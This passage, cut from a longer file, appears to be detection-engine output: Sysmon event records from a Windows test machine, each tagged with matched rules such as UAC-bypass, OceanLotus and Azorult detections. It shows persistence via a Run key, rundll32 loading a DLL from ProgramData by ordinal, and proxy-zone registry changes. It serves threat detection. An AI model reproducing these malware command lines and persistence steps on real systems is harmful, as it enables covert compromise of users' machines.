Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","ProcessGuid":"747F3D96-4BCE-5F88-0000-001070544D00","ProcessId":2572,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Tendyron","UtcTime":"2020-10-15 13:17:02.706"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":416056,"Execution":{"#attributes":{"ProcessID":3368,"ThreadID":4748}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-15T13:17:02.736849Z"}},"Version":2}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=F359D3C074135BBCA9A4C98A6B6544690EDAE93D,MD5=02825976B19F123872914C233CF309BB,SHA256=0DD700BB6A992FFD40B0D2B41FC5875CD3B319A7079F67B3DC37428B5005B354,IMPHASH=45D79E943E6D34075123B434B5AE3DEB","Image":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\OnKeyToken_KEB.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-4BCE-5F88-0000-001070544D00","ProcessId":2572,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-10-15 13:17:02.659"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":416061,"Execution":{"#attributes":{"ProcessID":3368,"ThreadID":4756}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-15T13:17:02.963417Z"}},"Version":3}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-23 21:57:34.734","Image":"c:\\Users\\Public\\test.tmp","ProcessGuid":"747F3D96-51CD-5F93-0000-001073735B00","ProcessId":7624,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp1375\\__tmp_rar_sfx_access_check_2914968","UtcTime":"2020-10-23 21:57:34.734"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":423992,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:34.745175Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-23 21:57:34.751","Image":"c:\\Users\\Public\\test.tmp","ProcessGuid":"747F3D96-51CD-5F93-0000-001073735B00","ProcessId":7624,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp1375\\d948","UtcTime":"2020-10-23 21:57:34.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":423993,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:34.767786Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-23 21:22:14.491","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\sduchxll.tmp","UtcTime":"2020-10-23 21:57:36.328"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424049,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.332819Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424060,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.375368Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424061,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.375422Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424062,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.375487Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424063,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.375545Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424064,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.376024Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424065,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.376053Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424066,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.376077Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424067,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.376099Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:57:36.406"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424078,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:57:36.417723Z"}},"Version":2}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"Rundll32.exe shell32.dll,Control_RunDLL C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-4690-5F93-0000-002019A60800","LogonId":"0x8a619","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":1216,"ProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ProcessId":7552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-23 21:58:17.171"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":424081,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:17.176847Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\Rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ProcessId":7552,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:17.532"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424114,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:17.542300Z"}},"Version":2}}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-4690-5F93-0000-002019A60800","LogonId":"0x8a619","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"Rundll32.exe shell32.dll,Control_RunDLL C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ParentProcessId":7552,"ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-23 21:58:17.542"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":424115,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:17.543407Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:21.688"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424174,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.693498Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424244,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.930237Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424245,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.930339Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424246,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.930392Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424247,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.930441Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424248,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.931190Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD 